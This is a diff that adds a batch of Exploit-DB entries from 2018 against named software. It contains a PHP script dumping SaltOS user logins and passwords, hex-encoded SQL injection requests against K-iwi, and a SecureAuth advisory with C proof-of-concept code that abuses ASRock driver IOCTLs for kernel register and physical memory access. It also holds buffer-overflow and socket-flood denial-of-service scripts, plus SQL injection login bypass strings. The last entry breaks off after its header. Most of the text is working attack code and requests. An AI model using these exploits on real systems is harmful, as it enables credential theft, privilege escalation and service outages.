 Content-Type: text/html;charset=UTF-8
 Transfer-Encoding: chunked
--- a/exploits/php/webapps/45734.txt
+++ b/exploits/php/webapps/45734.txt
@ -0,0 +1,47 @@
 # Exploit Title: SaltOS Erp, Crm 3.1 r8126 - Database File Download
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://www.saltos.org/
 # Software Link: http://download.saltos.org/?app=saltos&format=xul&arch=win32
 # Version: 3.1 r0 / 3.x
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18762
 # POC: 
 # 1)
 # http://localhost/[PATH]/files/saltos.db
 # 
 # [Mon Oct 29 00:05:49 2018] 127.0.0.1:2853 [200]: /index.php?action=logout
 # [Mon Oct 29 00:05:49 2018] 127.0.0.1:2856 [200]: /
 # [Mon Oct 29 00:05:51 2018] 127.0.0.1:2857 [200]: /files/saltos.db
 # 
 GET /files/saltos.db HTTP/1.1
 Host: localhost:57187
 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=a06furpg1gf54hqf573l886qs3; lang=es_ES; __lang__=1543317075; style=blue; __style__=1543317075; iconset=silk; __iconset__=1543317075
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 HTTP/1.1 200 OK
 Host: localhost:57187
 Connection: close
 Content-Type: application/octet-stream
 Content-Length: 8462336
 <?php
 $baglan = new SQLite3('saltos.db');
 $sonuc = $baglan->query('SELECT * FROM tbl_usuarios');
 while ($p = $sonuc->fetchArray()) {?>
 <h4><?php echo $p['login'];?></h4>
 <h4><?php echo $p['password'];?></h4>
 <?php } ?>
--- a/exploits/php/webapps/45735.txt
+++ b/exploits/php/webapps/45735.txt
@ -0,0 +1,59 @@
 # Exploit Title: K-iwi Framework 1775 - SQL Injection
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://www.k-iwi.com/
 # Software Link: https://sourceforge.net/projects/k-iwi/files/latest/download
 # Version: 1775
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18755
 # POC: 
 # 1)
 # http://localhost/[PATH]/index.php?route=admin/user/group/update&token=&user_group_id=[SQL]
 # 
 GET /[PATH]/index.php?route=admin/user/group/update&token=036aefc8aabf2ac8f6a4687ce432905d&user_group_id=1%39%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 01:45:01 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Set-Cookie: PHPSESSID=3sm3nbn5lero2rag4hj69ld3d0; path=/
 Set-Cookie: language=it_IT; expires=Sun, 25-Nov-2018 17:56:01 GMT; Max-Age=2592000; path=/; domain=192.168.1.27
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Content-Length: 1105
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 2)
 # http://localhost/[PATH]/index.php?route=admin/user/user/update&token=&user_id=[SQL]
 # 
 GET /[PATH]/index.php?route=admin/user/user/update&token=036aefc8aabf2ac8f6a4687ce432905d&user_id=11%39%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=3sm3nbn5lero2rag4hj69ld3d0; language=it_IT
 Connection: keep-alive
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 01:52:50 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Content-Length: 1105
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
--- a/exploits/windows/dos/45716.txt
+++ b/exploits/windows/dos/45716.txt
@ -0,0 +1,503 @@
 SecureAuth - SecureAuth Labs Advisory
 http://www.secureauth.com/
 ASRock Drivers Elevation of Privilege Vulnerabilities
 1. *Advisory Information*
 Title: ASRock Drivers Elevation of Privilege Vulnerabilities
 Advisory ID: CORE-2018-0005
 Advisory URL: https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities
 Date published: 2018-10-25
 Date of last update: 2018-10-25
 Vendors contacted: ASRock
 Release mode: Coordinated release
 2. *Vulnerability Information*
 Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed
 IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with
 Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient
 Access Control [CWE-782]
 Impact: Code execution
 Remotely Exploitable: No
 Locally Exploitable: Yes
 CVE Name: CVE-2018-10709, CVE-2018-10710, CVE-2018-10711, CVE-2018-10712
 3. *Vulnerability Description*
 ASRock's website states that [1]:
 ASRock Inc. is established in 2002, specialized in the field of
 motherboards. With the 3C design concept, Creativity, Consideration,
 Cost-effectiveness, the company explores the limit of motherboards
 manufacturing while paying attention on the eco issue at the same
 time, developing products with the consideration of eco-friendly
 concept. ASRock has been growing fast and become world third largest
 motherboard brand with headquarter in Taipei, Taiwan and branches in
 Europe and the USA.
 ASRock offers several utilities designed to give the user with an ASRock
 motherboard more control over certain settings and functions.
 These utilities include various features like the RGB LED control,
 hardware monitor, fan controls, and overclocking/voltage options.
 Multiple vulnerabilities were found in AsrDrv101.sys and AsrDrv102.sys
 low level drivers, installed by ASRock RGBLED and other ASRock branded
 utilities, which could allow a local attacker to elevate privileges.
 4. *Vulnerable Packages*
   . ASRock RGBLED before v1.0.35.1
   . A-Tuning before v3.0.210
   . F-Stream before v3.0.210
   . RestartToUEFI before v1.0.6.2
 5. *Vendor Information, Solutions and Workarounds*
 ASRock published the following fixed applications for each of its
 motherboards models:
   . ASRock RGBLED v1.0.36
   . A-Tuning v3.0.216
   . F-Stream v3.0.216
   . RestartToUEFI v1.0.7
 Downloads are available on the ASRock website.
 6. *Credits*
 These vulnerabilities were discovered and researched by Diego Juarez.
 The publication of this advisory was coordinated by Leandro Cuozzo
 from SecureAuth Advisories Team.
 7. *Technical Description / Proof of Concept Code*
 ASRock's RBGLED, A-Tuning, F-Stream, RestartToUEFI, and possibly others,
 use a low level driver to program and query the status on embedded ICs
 on their hardware. Fan curves, clock frequencies, LED colors, thermal
 performance, and other user customizable properties and monitoring
 functionality are exposed to applications through this low level kernel
 driver.
 The main subjects of this advisory are the device drivers
 installed/loaded by these utilities (AsrDrv101.sys and ArsDrv102.sys).
 >From now on addressed as "AsrDrv". Default installation allows
 non-privileged user processes (even running at LOW INTEGRITY) to get a
 HANDLE and issue IOCTL codes to the driver.
 The following sections describe the problems found.
 7.1. *CR register access*
 [CVE-2018-10709]
 AsrDrv exposes functionality to read and write CR register values. This
 could be leveraged in a number of ways to ultimately run code with
 elevated privileges.
 /-----
 // Asrock RGBLED PoC demonstrating non-privileged access to CR registers
 #include <windows.h>
 #include <stdio.h>
 #define IOCTL_ASROCK_READCR 0x22286C
 #define IOCTL_ASROCK_WRITECR 0x222870
 HANDLE ghDriver = 0;
 #pragma pack (push,1)
 typedef struct _ASROCK_CR_STRUCT {
    ULONG64 reg;
    ULONG64 value;
 } ASROCK_CR_STRUCT;
 #pragma pack(pop)
 #define IOCTLMACRO(iocontrolcode, size) \
    ULONG64 outbuffer[2] = { 0 };    \
    DWORD returned = 0;    \
    DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);    \
    return outbuffer[1];    \
 ULONG64 ASROCK_ReadCR(DWORD reg)
 {
    ASROCK_CR_STRUCT  inbuffer = { 3, 0};
    IOCTLMACRO(IOCTL_ASROCK_READCR, 10)
 }
 ULONG64 ASROCK_WriteCR(DWORD reg, ULONG64 value)
 {
    ASROCK_CR_STRUCT  inbuffer = { reg, value};
    IOCTLMACRO(IOCTL_ASROCK_WRITECR, 10)
 }
 BOOL InitDriver()
 {
    char szDeviceName[] = "\\\\.\\AsrDrv101";
    ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
        return FALSE;
    }
    return TRUE;
 }
 int main(int argc, char* argv[])
 {
    printf("Asrock RGBLED PoC (CR access) - pnx!/CORE\n");
    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        exit(0);
    }
    ULONG64 a = ASROCK_ReadCR(3);
    printf("CR3 (PageDir): %llx\n", a);
    printf("press ENTER for instant system CRASH\n");
    getchar();
    a = ASROCK_WriteCR(3, 0xffff1111ffff2222);
    CloseHandle(ghDriver);
 }
 -----/
 7.2. *Arbitrary physical memory read/write*
 [CVE-2018-10710]
 AsrDrv's IOCTL code 0x22280C exposes a functionality to read and write
 arbitrary physical memory, this could be leveraged by a local attacker
 to elevate privileges.
 Proof of Concept:
 /-----
 // Asrock RGBLED PoC (arbitrary physical memory write)
 // This PoC demonstrates arbitrary write to physical memory.
 #include <windows.h>
 #include <stdio.h>
 #define IOCTL_ASROCK_WRITEPH 0x22280C
 HANDLE ghDriver = 0;
 #pragma pack (push,1)
 typedef struct _ASROCK_PH_STRUCT {
    ULONG64 destPhysical;
    DWORD size;
    DWORD unk0;
    ULONG64 src;
 } ASROCK_PH_STRUCT;
 #pragma pack(pop)
 BOOL ASROCK_ph_memcpy(ULONG64 dest, ULONG64 src, DWORD size)
 {
    ASROCK_PH_STRUCT mystructIn = { dest, size, 0, src};
    BYTE outbuffer[0x30] = { 0 };
    DWORD returned = 0;
    DeviceIoControl(ghDriver, IOCTL_ASROCK_WRITEPH, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);
    if (returned) {
        return TRUE;
    }
    return FALSE;
 }
 BOOL InitDriver()
 {
    char szDeviceName[] = "\\\\.\\AsrDrv101";
    ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
        return FALSE;
    }
    return TRUE;
 }
 int main(int argc, char * argv[])
 {
    printf("Asrock RGBLED PoC (arbitrary physical memory write) - pnx!/CORE\n");
    if (!InitDriver()) {
        exit(0);
    }
    printf("press ENTER for SYSTEM CRASH\n");
    getchar();
    ULONG64 data = 0xFFFF1111FFFF2222;
    for (unsigned int i = 0; i < 0xffffffff; i += 0x1000) {
        printf(".");
        ASROCK_ph_memcpy(i, (ULONG64)&data, 8);
    }
    CloseHandle(ghDriver);
    return 0;
 }
 -----/
 7.3. *MSR Register access*
 [CVE-2018-10711]
 AsrDrv exposes functionality to read and write Machine Specific
 Registers (MSRs). This could be leveraged to execute arbitrary ring-0
 code.
 Proof of Concept:
 /-----
 // Asrock RGBLED PoC demonstrating non-privileged access to MSR registers
 // This PoC demonstrates non privileged MSR access by reading
 // IA32_LSTAR value (leaks a kernel function pointer bypassing KASLR)
 // and then writing garbage to it (instant BSOD!)
 #include <windows.h>
 #include <stdio.h>
 #define IOCTL_ASROCK_RDMSR 0x222848
 #define IOCTL_ASROCK_WRMSR 0x22284C
 HANDLE ghDriver = 0;
 #pragma pack (push,1)
 typedef struct _ASROCK_MSRIO_STRUCT {
    ULONG64 valLO;            //
    DWORD reg;            //
    ULONG64 valHI;        //
 } ASROCK_MSRIO_STRUCT;
 #pragma pack(pop)
 #define IOCTLMACRO(iocontrolcode, size) \
    ASROCK_MSRIO_STRUCT outbuffer = { 0 };\
    DWORD returned = 0;    \
    DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)&outbuffer, sizeof(outbuffer), &returned, NULL);    \
    return (outbuffer.valHI<<0x20 | outbuffer.valLO);    \
 ULONG64 GIO_RDMSR(DWORD reg)
 {
    ASROCK_MSRIO_STRUCT inbuffer = { 0, reg };
    IOCTLMACRO(IOCTL_ASROCK_RDMSR, 20)
 }
 ULONG64 GIO_WRMSR(DWORD reg, ULONG64 value)
 {
    ASROCK_MSRIO_STRUCT inbuffer = { value & 0xffffffff, reg, (value & 0xffffffff00000000)>>0x20 };
    IOCTLMACRO(IOCTL_ASROCK_WRMSR, 20)
 }
 BOOL InitDriver()
 {
    char szDeviceName[] = "\\\\.\\AsrDrv101";
    ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
        return FALSE;
    }
    return TRUE;
 }
 int main(int argc, char * argv[])
 {
    printf("Asrock RGBLED PoC (MSR access) - pnx!/CORE\n");
    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        exit(0);
    }
    ULONG64 a = GIO_RDMSR(0xC0000082);
    printf("IA322_LSTAR: %llx (nt!KiSystemCall64)\n", a);
    printf("press ENTER for instant BSOD\n");
    getchar();
    a = GIO_WRMSR(0xC0000082, 0xffff1111ffff2222);
    return (int)CloseHandle(ghDriver);
 }
 -----/
 7.4. *Port mapped I/O access*
 [CVE-2018-10712]
 AsrDrv exposes functionality to read/write data from/to IO ports. This
 could be leveraged in a number of ways to ultimately run code with
 elevated privileges.
 /-----
 // Asrock RGBLED PoC demonstrating non-privileged access to IO ports
 #include <windows.h>
 #include <stdio.h>
 #define IOCTL_ASROCK_PORTREADB 0x222810
 #define IOCTL_ASROCK_PORTWRITEB 0x222814
 HANDLE ghDriver = 0;
 #pragma pack (push,1)
 typedef struct _ASROCK_CR_STRUCT {
    DWORD port;
    ULONG64 value;
 } ASROCK_CR_STRUCT;
 #pragma pack(pop)
 #define IOCTLMACRO(iocontrolcode, size) \
    BYTE outbuffer[0x10] = { 0 };    \
    DWORD returned = 0;    \
    DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);    \
    return outbuffer[1];    \
 BYTE ASROCK_ReadPortB(DWORD port)
 {
    ASROCK_CR_STRUCT  inbuffer = { port, 0};
    IOCTLMACRO(IOCTL_ASROCK_PORTREADB, 10)
 }
 BYTE ASROCK_WritePortB(DWORD port, ULONG64 value)
 {
    ASROCK_CR_STRUCT  inbuffer = { port, value};
    IOCTLMACRO(IOCTL_ASROCK_PORTWRITEB, 10)
 }
 void Reboot()
 {
    BYTE cf9 = ASROCK_ReadPortB(0xcf9) & ~0x6;
    ASROCK_WritePortB(0xcf9, cf9 | 2);
    Sleep(50);
    ASROCK_WritePortB(0xcf9, cf9 | 0xe);
    Sleep(50);
 }
 BOOL InitDriver()
 {
    char szDeviceName[] = "\\\\.\\AsrDrv101";
    ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
        return FALSE;
    }
    return TRUE;
 }
 int main(int argc, char * argv[])
 {
    printf("Asrock RGBLED PoC (PMIO access) - pnx!/CORE\n");
    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        exit(0);
    }
    Reboot();
    return (int)CloseHandle(ghDriver);
 }
 -----/
 8. *Report Timeline*
 2018-03-12: SecureAuth sent an initial notification to ASRock America
 Support.
 2018-03-13: ASRock confirmed the receipt and requested additional
 information in order to send it to its HQ.
 2018-03-13: SecureAuth answered saying that a draft advisory has been
 written, including a technical description, and requested for PGP keys
 in order to send it encrypted.
 2018-03-14: ASRock answered asking for the advisory in clear text.
 2018-03-14: SecureAuth sent the draft advisory to ASRock in clear text
 form.
 2018-03-14: ASRock confirmed the receipt and informed they would submit
 it to the HQ for validation.
 2018-03-23: SecureAuth requested a status update on the case.
 2018-03-23: ASRock answered saying they didn't have a reply from HQ.
 2018-03-26: ASRock notified SecureAuth they were still checking the
 reported vulnerabilities and requested additional time.
 2018-03-27: SecureAuth thanked the status update and informed ASRock
 that would be in contact the following week.
 2018-03-28: ASRock informed SecureAuth they checked the reported
 vulnerabilities and they would have a preliminary schedule for the fix
 at the end of April.
 2018-03-28: SecureAuth thanked ASRock's reply.
 2018-04-20: ASRock notified that the driver was modified and sent to
 SecureAuth the fixed applications and requested for a feedback.
 2018-04-23: SecureAuth acknowledged the reception of the fixed
 applications.
 2018-05-09: SecureAuth tested the modified driver and verified that the
 issues detailed in the proofs of concept were solved.
 For that reason, SecureAuth propose release date to be May 23rd.
 2018-05-09: ASRock thanked SecureAuth's update and forwarded the
 proposal to its HQ for a confirmation.
 2018-05-15: ASRock notified SecureAuth that they were going to deploy
 the new driver architecture into each ASRock utility.
 For the whole project, ASRock estimated to finish by the end of June.
 2018-05-15: SecureAuth thanked ASRock's update and asked if ASRock had
 planned to release a security note.
 2018-05-23: ASRock informed that each utility would include a release
 note with a security description.
 2018-06-15: SecureAuth requested ASRock a status update about its
 timescale.
 2018-06-09: ASRock forwarded the request to its HQ.
 2018-06-19: ASRock informed that they had started to upload the fixed
 drivers for one of the supported motherboard series
 and they were going to continue uploading the drivers for other models.
 2018-07-11: SecureAuth requested ASRock a status update.
 2018-07-11: ASRock replied saying they were still working on the upload
 process.
 2018-08-06: SecureAuth requested ASRock a new status update.
 2018-08-16: ASRock notified SecureAuth they had finished with the update
 process.
 2018-10-17: SecureAuth set October 25th as the publication date.
 2018-10-25: Advisory CORE-2018-0005 published.
 9. *References*
 [1] http://www.asrock.com/
 10. *About SecureAuth Labs*
 SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
 with anticipating the future needs and requirements for information
 security technologies. We conduct research in several important areas of
 computer security, including identity-related attacks, system
 vulnerabilities and cyber-attack planning. Research includes problem
 formalization, identification of vulnerabilities, novel solutions and
 prototypes for new technologies. We regularly publish security
 advisories, primary research, technical publications, research blogs,
 project information, and shared software tools for public use at
 http://www.secureauth.com.
 11. *About SecureAuth*
 SecureAuth is leveraged by leading companies, their employees, their
 customers and their partners to eliminate identity-related breaches.
 As a leader in access management, identity governance, and penetration
 testing, SecureAuth is powering an identity security revolution by
 enabling people and devices to intelligently and adaptively access
 systems and data, while effectively keeping bad actors from doing harm.
 By ensuring the continuous assessment of risk and enablement of trust,
 SecureAuth's highly flexible Identity Security Automation (ISA) platform
 makes it easier for organizations to prevent the misuse of credentials
 and exponentially reduce the enterprise threat surface. To learn more,
 visit www.secureauth.com<http://www.secureauth.com>, call (949) 777-6959, or email us at
 info@secureauth.com<mailto:info@secureauth.com>
 12. *Disclaimer*
 The contents of this advisory are copyright (c) 2018 SecureAuth, and are
 licensed under a Creative Commons Attribution Non-Commercial Share-Alike
 3.0 (United States) License:
 http://creativecommons.org/licenses/by-nc-sa/3.0/us/
--- a/exploits/windows/dos/45732.txt
+++ b/exploits/windows/dos/45732.txt
@ -0,0 +1,27 @@
 # Exploit Title: Modbus Slave 7.0.0 - Denial of Service (PoC)
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.modbustools.com/
 # Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
 # Software Link: https://www.modbustools.com/download/ModbusSlaveSetup64Bit.exe
 # Version: 7.0.0
 # Category: Dos
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18759
 # POC: 
 # 1)
 # F3 & Connection / Connect / Registration Key
 #!/usr/bin/python
 buffer = "A" * 603
 try:
    f=open("sie.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
 except:
    print "File cannot be created"
--- a/exploits/windows_x86-64/dos/45705.py
+++ b/exploits/windows_x86-64/dos/45705.py
@ -0,0 +1,25 @@
 # Exploit Title: Navicat 12.0.29 - 'SSH' Denial of Service (PoC)
 # Author: Rafael Alfaro
 # Discovery Date: 2018-10-27
 # Vendor Homepage: https://www.navicat.com/es/
 # Software Link : https://www.navicat.com/es/download/navicat-premium
 # Vulnerability Type: Denial of Service (DoS) Local
 # Tested on OS: Windows 7 x64 en, Windows 10 Home x64 es
 # Steps to Produce the Crash:
 # 1.- Run python code : python Navicat-SSH.py
 # 2.- Open navicat.txt and copy content to clipboard
 # 3.- Open navicat.exe
 # 4.- Click "Conexion" and select "MySQL..."
 # 5.- In the "General" tab, give a name to the connection in "Nombre de Conexion" (i. e. conexion1).
 # 6.- In the "SSH" tab check "Uso de tunel SSH", then set and IP address to the "Host" textbox (i. e. 127.0.0.1) and write down a username in "Nombre de usuario" (i. e. admin).
 # 7.- Be sure that "Metodo de autentificacion" is set to "Contrasena" and finally paste Clipboard in "Contrasena".
 # 8.- Click "Aceptar".
 # 9.- Crashed!
 # !/usr/bin/env python Navicat-SSH.py
 buffer = "\x41" * 5000
 f = open("navicat.txt", "w")
 f.write(buffer)
 f.close()
--- a/exploits/windows_x86-64/dos/45708.py
+++ b/exploits/windows_x86-64/dos/45708.py
@ -0,0 +1,22 @@
 # Exploit Title:  AlienIP 2.41 - Denial of Service (PoC)
 # Author: Arturo de la Cruz Tellez
 # Discovery Date: 2018-10-17
 # Vendor Homepage: http://www.armcode.com
 # Tested Version: 2.41
 # Tested on OS: Microsoft Windows 10 Home Single Language x64
 # Versión	10.0.10240 compilación 10240
 # PoC
 # Steps to produce the crash
 # 1.- Run python code : python AlienIP2.41.py
 # 2.- Open AlienIP2.41.txt and copy context to clipboard
 # 3.- Open AlienIP.exe
 # 4.- Paste clipboard on IP address or Country 
 # 5.- Click in Locate host
 # 5.- Enter
 # 6.- Crashed alienip.exe dejo de funcionar
 buffer = "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 69
 f = open ("AlienIP2.41.txt", "w")
 f.write(buffer)
 f.close()
--- a/exploits/windows_x86-64/dos/45711.py
+++ b/exploits/windows_x86-64/dos/45711.py
@ -0,0 +1,46 @@
 # Exploit Title: Local Server 1.0.9 - Denial of Service (PoC)
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://www.ujang-rohidin.blogspot.com/
 # Software Link: https://sourceforge.net/projects/local-server/files/latest/download
 # Version: 1.0.9
 # Category: Dos
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18756
 # POC: 
 # 1)
 #!/usr/bin/python
 import socket
 print """
         \\\|///
       \\  - -  //
        (  @ @ )
 ----oOOo--(_)-oOOo----
 Local Server 1.0.9 Dos
 	  Ihsan Sencan
 ---------------Ooooo----
                (   )
       ooooO     ) /
       (   )    (_/
        \ (
         \_)
 """
 Ip = raw_input("[Ip]: ")
 Port = 4008 # Default port
 d=[]
 c=0
 while 1:
    try:
        d.append(socket.create_connection((Ip,Port)))
        d[c].send("DOOM")
        print "Sie!"
        c+=1
    except socket.error: 
        print "+ Done! +"
        raw_input()
        break
--- a/exploits/windows_x86-64/local/45709.vb
+++ b/exploits/windows_x86-64/local/45709.vb
@ -0,0 +1,57 @@
 # Exploit Title: School Equipment Monitoring System 1.0 - 'login' SQL Injection 
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_0.zip
 # Version: 1.0
 # Category: Windows
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18806
 # POC: 
 # 1)
 User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||'
 Pass: Null
 # POC: 
 # 2)
 # User: 'or 1=1 or ''='
 # Pass: Null
 # 
 # https://4.bp.blogspot.com/-ILPqY1iygBY/W9YnEkjH9fI/AAAAAAAAENQ/34rcdTiwPDIeBzPhuj8roYPMIPOshiFvwCLcBGAs/s1600/sql2.png
 # 
 #[PATH]/include/user.vb / 28 / '" & username & "'
 #....
 #24     Public Sub login(ByVal username As Object, ByVal pass As Object)
 #25         Try
 #26 
 #27             con.Open()
 #28             reloadtxt("SELECT * FROM `tbluseraccounts` WHERE Username= '" & username & "' and Pass = sha1('" & pass & "')")
 #29 
 #30 
 #31             If dt.Rows.Count > 0 Then
 #32 
 #33                 If dt.Rows(0).Item("Role") = "Administrator" Then
 #34                     MsgBox("Welcome " & dt.Rows(0).Item("Role"))
 #35                     Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
 #36                     Form1.LogoutToolStripMenuItem.Text = "Logout"
 #37                     visibleMenu("true", "admin")
 #38                     LoginForm1.Close()
 #39                 Else
 #40                     visibleMenu("true", "not admin")
 #41                     Form1.LogoutToolStripMenuItem.Text = "Logout"
 #42                     LoginForm1.Close()
 #43                 End If
 #44 
 #45             Else
 #46                 MsgBox("Acount doest not exits!", MsgBoxStyle.Information)
 #47             End If
 #48         Catch ex As Exception
 #49             MsgBox(ex.Message)
 #50         End Try
 #51         con.Close()
 #52         da.Dispose()
 #53     End Sub
 #....
--- a/exploits/windows_x86/local/45710.pl
+++ b/exploits/windows_x86/local/45710.pl
@ -0,0 +1,43 @@
 # Exploit Title: Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)
 # Author: Kağan Çapar
 # Discovery Date: 2018-10-27
 # Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
 # Vendor Homepage : https://www.modbustools.com
 # Tested Version: 7
 # Tested on OS: Windows XP SP3 *ENG
 # other version should be affected
 # About software : Modbus Slave is for simulating up to 32 slave devices in 32 windows!. 
 # Speed up your PLC programming with this simulating tools.  Used for SCADA systems.
 # Modbus is a serial communications protocol originally published by Schneider Electric
 # Steps to Reproduce: Run the perl exploit script, it will create a new
 # file with the name "exploit.msw" and Drag on to "mbslave.exe"
 # you will see a loop and crash on software
